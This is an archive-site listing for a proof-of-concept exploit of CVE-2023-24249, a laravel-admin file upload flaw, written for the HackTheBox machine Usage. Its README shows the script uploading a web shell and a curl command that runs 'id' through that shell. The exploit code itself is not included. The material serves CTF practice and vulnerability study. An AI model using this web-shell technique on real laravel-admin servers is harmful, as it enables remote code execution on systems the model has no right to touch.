Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-24249 PoC — laravel-admin 代码问题漏洞

Source
https://github.com/ldb33/CVE-2023-24249-PoC
Associated Vulnerability
Title:laravel-admin 代码问题漏洞 (CVE-2023-24249)
Description:An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file.
Description
Proof of concept for HTB easy machine Usage
Readme
# CVE-2023-24249 PoC
[CVE-2023-24249](https://nvd.nist.gov/vuln/detail/CVE-2023-24249) is an arbitrary file upload vulnerability in laravel-admin v1.8.19. This proof of concept exploits the vulnerability to upload a web shell.

The exploit was written to use against the HackTheBox easy machine [Usage](https://app.hackthebox.com/machines/Usage).

# Example
```
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php

curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id                                            
uid=1000(dash) gid=1000(dash) groups=1000(dash)
```
File Snapshot

 [4.0K]  /data/pocs/7a226f7a9670e41c671fd27d6de3fb05a5ebb7c8
├── [1.0K]  CVE-2023-24249.py
└── [ 671]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →